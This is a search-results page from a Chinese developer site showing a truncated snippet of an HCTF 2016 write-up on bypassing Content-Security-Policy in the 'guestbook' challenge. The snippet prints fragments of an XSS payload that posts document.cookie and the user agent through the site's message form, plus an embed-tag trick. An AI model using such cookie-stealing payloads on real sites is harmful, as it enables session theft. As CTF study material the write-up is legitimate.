首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    hctf2016 guestbook&secret area writeup

    paper.seebug.org/91/ 当然我自己也写了分析文章 http://lorexxar.cn/2016/10/28/csp-then/ 源码 https://github.com/LoRexxar/hctf2016...bypassing-paths-with-open-redirects-in-csp/ 当然我自己也写了分析文章 http://lorexxar.cn/2016/10/31/csp-then2/ 源码 https://github.com/LoRexxar/hctf2016...可以修改个人信息河头乡->向任何人留言 稍微测试,不难发现 Content-Security-Policy:default-src 'self'; script-src http://sguestbook.hctf.io...如果顺着思路到这里,很容易就会想到下一步 构造上传图像为 var xml = new XMLHttpRequest(); xml.open('POST', 'http://sguestbook.hctf.io...post","submit.php",'to=qqc&message=document.cookie'+ck+ua); stop(); 然后构造 <embed src="http://sguestbook.<em>hctf</em>.io

    25320

    扫码

    添加站长 进交流群

    领取专属 10元无门槛券

    手把手带您无忧上云

    扫码加入开发者社群

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭
      领券